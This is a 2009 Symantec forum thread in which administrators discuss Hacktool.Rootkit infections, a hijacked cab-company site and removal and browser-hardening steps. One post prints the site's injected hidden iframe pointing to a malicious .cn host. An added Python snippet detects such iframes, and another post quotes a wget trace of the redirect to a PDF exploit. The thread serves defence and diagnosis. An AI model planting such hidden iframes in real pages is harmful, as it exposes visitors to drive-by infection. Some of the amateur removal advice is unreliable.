Endpoint Protection


Hacktool.Rootkit

  • 1.  Hacktool.Rootkit

    Posted May 15, 2009 02:38 PM

    I have seen this come up an awful lot in my environment in the past few weeks. Symantec classifies this a "very low" severity, but when you read the summary, they state "All files that are detected as Hacktool.Rootkit should be deleted. Infected systems may need to be restored from backups or patched to restore security".

    That sounds pretty severe to me. Especially considering the amount of systems that I am seeing. These are being detected and thrown into quarantine but my threat count has gone through the roof.

    Does anyone have experience dealing with this threat?

    Thanks



  • 2.  RE: Hacktool.Rootkit

    Posted May 15, 2009 07:07 PM
    What is the exact path of the infection? Knowing the entry point of the virus in the hard drive could provide information.

    You need to know what rootkits in general do: "A rootkit is a software system that consists of a program or combination of several programs designed to hide or obscure the fact that a system has been compromised."

    But if Symantec defines it as software that grants administrator or root access to someone, then it should be dealt with immediately.

    The severity would probably mean the amount of damage it can do to a network. Maybe infection rate is added in the equation.

    You need to patch up if this has already spread through your network. Know all the ports it uses to access external PCs.


  • 3.  RE: Hacktool.Rootkit

    Posted May 15, 2009 07:17 PM
    this may help: http://www.symantec.com/security_response/severityassessment.jsp

    of note though will be that we are getting more generic with our detections, hence the name "Hacktool.Rootkit" so we perhaps need to look again at the severity for these


  • 4.  RE: Hacktool.Rootkit

    Posted May 21, 2009 12:22 PM

    We had a user find one today, it made an executable with his user name as the file name, thought that was an interesting touch. Appears to be Russian by the script and file contents. Symantec detected the sys file in the c:/windows/system32/drivers folder and deleted it but I had to do the hard work myself. It seems to be attempting to create a virtual drive or emulate a USB drive for some reason.



  • 5.  RE: Hacktool.Rootkit

    Posted May 21, 2009 12:48 PM
    Timestamp: 05/21/09 09:45:40
    Input URL: http://www.orangecab.net
    Web server IPv4 address: 68.180.151.74
    ***###Received Web Page text begins after this line###***
    HTTP/1.0 200 OK
    Date: Thu, 21 May 2009 16:45:52 GMT
    P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
    Content-Type: text/html
    Age: 2
    Server: YTS/1.17.13

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
    <title>Orange Cab</title>
    </head><iframe src="http://namebrandmart.cn/in.cgi?income18" width=1 height=1 style="visibility: hidden"></iframe>
    </html>

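    An added example (not from the thread or from Symantec) that turns the traits of the injected iframe in the capture above (off-site source, 1x1 size, visibility:hidden, inserted between </head> and <body>) into a small stdlib-only Python checker; the sample HTML is constructed from that capture, with a benign same-site iframe added as a control.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

class IframeAuditor(HTMLParser):
    """Collect every <iframe> together with whether it sits inside <body>."""
    def __init__(self):
        super().__init__()
        self.in_body = False
        self.iframes = []          # list of (attrs dict, inside_body)
    def handle_starttag(self, tag, attrs):
        if tag == "body":
            self.in_body = True
        elif tag == "iframe":
            self.iframes.append((dict(attrs), self.in_body))
    def handle_endtag(self, tag):
        if tag == "body":
            self.in_body = False

def _tiny(value):
    """True for a width/height of 0 or 1 (bare number or '1px')."""
    try:
        return int(str(value).rstrip("px").strip()) <= 1
    except ValueError:
        return False

def suspicious_iframes(html, page_host):
    """Return (src, reasons) for iframes showing at least two injection traits."""
    p = IframeAuditor()
    p.feed(html)
    findings = []
    for attrs, inside_body in p.iframes:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname or ""
        style = (attrs.get("style") or "").replace(" ", "").lower()
        reasons = []
        if host and host != page_host and not host.endswith("." + page_host):
            reasons.append("third-party host " + host)     # off-site source
        if _tiny(attrs.get("width")) and _tiny(attrs.get("height")):
            reasons.append("1x1 frame")                      # invisible size
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        if not inside_body:
            reasons.append("placed outside <body>")          # tacked on after </head>
        if len(reasons) >= 2:
            findings.append((src, reasons))
    return findings

# Constructed sample: the injected iframe from the capture above plus a benign
# same-site iframe that must not be flagged.
SAMPLE = ('<html><head><title>Orange Cab</title></head><iframe src="http://namebrandmart.cn/in.cgi?income18" width=1 height=1 style="visibility: hidden"></iframe>\n'
          '<body><iframe src="http://www.orangecab.net/map.html" width="300" height="200"></iframe></body></html>')
```

    Running suspicious_iframes(SAMPLE, "orangecab.net") reports only the namebrandmart.cn frame, with all four reasons.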

  • 6.  RE: Hacktool.Rootkit

    Posted May 21, 2009 01:34 PM
    we also faced this problem earlier; but after putting rapid release definitions in place symantec was able to remove the virus


  • 7.  RE: Hacktool.Rootkit

    Posted May 21, 2009 01:35 PM
    I checked the websites. orangecab.net seems legitimate.
    I didn't find any useful info on namebrandmart.cn but I'm thinking that it has malicious code in it and the other website - orangecab.net is hijacked.


  • 8.  RE: Hacktool.Rootkit

    Posted May 21, 2009 06:21 PM
    From: http://ask.metafilter.com/117620/Have-I-suffered-a-PDF-exploit
    "
    I tried to visit the web site of a local business, and a PDF was automatically and unexpectedly downloaded. What was it trying to do, and how can I know whether I avoided the exploit?


    The web site was orangecab dot net, and its homepage contains an extraneous-seeming iframe for namebrandmart dot cn, with filename in.cgi?income18. Following that with wget as follows (replacing "." with " dot " as necessary)


    $ wget http://namebrandmart dot cn/in.cgi?income18
    --11:06:12-- http://namebrandmart dot cn/in.cgi?income18
    Resolving namebrandmart dot cn... 94.247.3.150
    Connecting to namebrandmart dot cn|94.247.3.150|:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Cookie coming from namebrandmart dot cn attempted to set domain to mmcounter dot com
    Cookie coming from namebrandmart dot cn attempted to set domain to mmcounter dot com
    Cookie coming from namebrandmart dot cn attempted to set domain to mmcounter dot com
    Location: http://freewebhostguide dot com/index.php [following]

    That file, in turn, contains an iframe for cache/readme.pdf. That caused Acrobat Reader to stall, but I tried to kill it as quickly as possible. Using Acrobat Reader 8.1.1/WinXPSP2.

    What to do now?
    posted by grouse
    "


  • 9.  RE: Hacktool.Rootkit

    Posted May 26, 2009 11:53 AM


    I have been testing the following configuration with some success. At least against the PDF.Exploits.

    Run Internet Explorer as a restricted user using a secure runas-style application:

    Example
    runas /profile /env /user:domain\luser "C:\Program Files\Internet Explorer\iexplore.exe"



    Lock down IE7 or 8: enable or disable the following with a GPO

    1. Enable - Empty Temporary Internet Files folder when browser is closed
    2. Disable - Allow installation of desktop items
    3. Disable - Open windows without address or status bars
    4. Disable - Launching applications and files in an IFRAME
    5. Disable - Allow active scripting
    6. Disable - Allow file downloads
    7. Restrict file size limits for Internet zone to 32kb
    8. Restrict File Download for Internet Explorer Processes


    Lock down Adobe Acrobat 9.01: enable or disable the following

    1. Enable Enhanced Security
    2. Uncheck “Display PDF in browser”
    3. Uncheck “Allow fast webview”
    4. Uncheck “Allow speculative downloading in the background”
    5. Uncheck “Enable Acrobat JavaScript”


  • 10.  RE: Hacktool.Rootkit

    Posted May 26, 2009 12:49 PM
    It might be detecting just one of the rootkits from a bunch; make sure there are no more rootkits that got installed on your system.
    Scan your system using Microsoft Sysinternals RootkitRevealer or IceSword.
    If any more rootkits are found, submit them to Symantec Security Response.

    Once you are compromised never be 100% confident in any antivirus software (no antivirus is 100% safe); check it yourself, there might be some other rootkit that is acting as a downloader for other rootkits.
    Scan with the latest virus defs and RootkitRevealer.


  • 11.  RE: Hacktool.Rootkit

    Posted May 28, 2009 05:35 AM
    as far as the rootkit is concerned my past experience says symantec is best solution. . .


  • 12.  RE: Hacktool.Rootkit

    Posted Jun 01, 2009 03:42 PM
    Hello Friends,

    I am new to this forum and new to this idiot virus as well.
    I faced this virus last week when I was in US and due to this, I had to spare my weekend in the removal of this.

    I am currently using SYMANTEC ENDPOINT PROTECTION (corporate virus protection).

    This virus comes from an infected file or link (generally sent by one whose ID has already been attacked once). One more interesting thing I found: this virus attacks where IE (Internet Explorer) is used the most.

    So after googling around for the whole day and trying so many things I came to the following solution , which I think will work for you all as well:

    1. First of all restart your system in SAFE MODE and then Turn Off All the System Restores by going through My Computer--> Properties --> System Restore --> Turn Off System Restore for all drives.

    2. Make all the folders and sub folders(hidden and unhidden ones) viewable.

    3. Check the C:\Documents & Settings folder and each of its sub-folders, even the hidden ones. Since this virus is used to hack passwords, it generally makes a folder in this directory only.

    4. There you will find some suspicious file, which will have a link on the desktop and in the task bar as well. This can be judged by looking at which icon it is using in the task bar. Delete that folder.

    5. Then run the antivirus on your system.
    6. Download Malwarebytes Anti-Malware from http://malwarebytes.org/ since this virus creates registry entries as well.

    7. Then restart the system in normal mode with System Restore off. 

    8. Execute Malwarebytes and scan the whole system. It is pretty fast and will do all the scanning within a few minutes and will ask to remove and repair the infected registries. Allow it.

    9. Then execute the anti-virus on your machine in full mode and leave that. T

    10. Turn the System Restore ON and restart your system.

    Hopefully , this will remove this nostalgic virus from your system. It has worked for me.






  • 13.  RE: Hacktool.Rootkit

    Posted Jun 01, 2009 10:46 PM
    Boy, are you in for a surprise! Gmer is excellent against high level rootkits, otherwise use Malware Bytes or A-squared Anti Malware.


  • 14.  RE: Hacktool.Rootkit

    Posted Jun 17, 2009 10:15 PM
    Greetings.

    I have run into hacktool.rootkit (generically speaking), and two things seem apparent.

    Infection seems to require nothing more than directing a browser to a URL...user action beyond simply going to a site does not seem to be required.  The version I encountered appears to use cache/readme.pdf and cache/flash.swf.  The URL was .cn

    The latest virus definitions files as at 06-17-09 had much difficulty eradicating this trojan, were only partially successful, and were not able to stop the firstname.lastname.exe file from running on boot.  Multiple scans in both safe and normal mode failed to detect and deal with it, with the safe scans reporting absolutely nothing.  Eventually, it got most of it on one of the passes.

    It was only with manual extraction of registry entries, a PF file, and the .exe file that the problem seems to be solved.  Given Symantec's difficulty in reeling this one in, I think I will wipe this machine.  I simply can't trust the AV on this one, and it's just better to know for sure.

    Cheers.


  • 15.  RE: Hacktool.Rootkit

    Posted Jun 17, 2009 11:42 PM
    Yes I know that is such a hassle to do, but you make a good point. Depending on your environment, and what your machines are responsible for sometimes the only option left is to fully wipe a machine. Just wanted to point out too that sometimes it is helpful as well to submit the sample to Symantec and then download the rapid release that will soon follow. With the constant variations on threats this is another way that helps to fully eradicate certain threats. Hope everything goes well with the reinstall.

    Grant-